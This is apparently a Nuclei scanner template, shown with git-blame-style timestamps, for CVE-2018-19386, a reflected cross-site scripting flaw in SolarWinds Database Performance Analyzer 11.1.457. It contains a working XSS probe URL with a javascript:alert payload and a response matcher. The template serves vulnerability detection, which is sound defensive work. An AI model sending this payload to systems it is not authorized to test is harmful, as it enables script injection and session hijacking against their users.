2021-01-02 05:00:39 +00:00
id : CVE-2018-19386
2020-09-09 01:45:42 +00:00
info :
2022-09-08 13:28:46 +00:00
name : SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
2020-09-09 01:45:42 +00:00
author : pikpikcu
severity : medium
2022-09-08 13:28:46 +00:00
description : SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://i.imgur.com/Y7t2AD6.png
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-19386
2024-01-29 17:11:14 +00:00
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/merlinepedra/nuclei-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-19386
cwe-id : CWE-79
2023-11-10 17:07:52 +00:00
epss-score : 0.00177
2024-05-31 19:23:20 +00:00
epss-percentile : 0.54797
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : solarwinds
product : database_performance_analyzer
tags : cve,cve2018,solarwinds,xss
2020-09-09 01:45:42 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-09 01:45:42 +00:00
- method : GET
path :
2020-10-15 18:50:10 +00:00
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
2020-09-09 01:45:42 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-09-08 13:28:46 +00:00
- '<a href="javascript:alert(document.domain)//'
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022100d7e6ee6c4a5dacc72f204038317f3d576080fb833cb02aab58fb9a32ac0339ed0220684eb3d85d15b9ecff6fc2978c4574372dc3adf26c14c12edff24287e95f6c0e:922c64590222798bb761d5b6d8e72950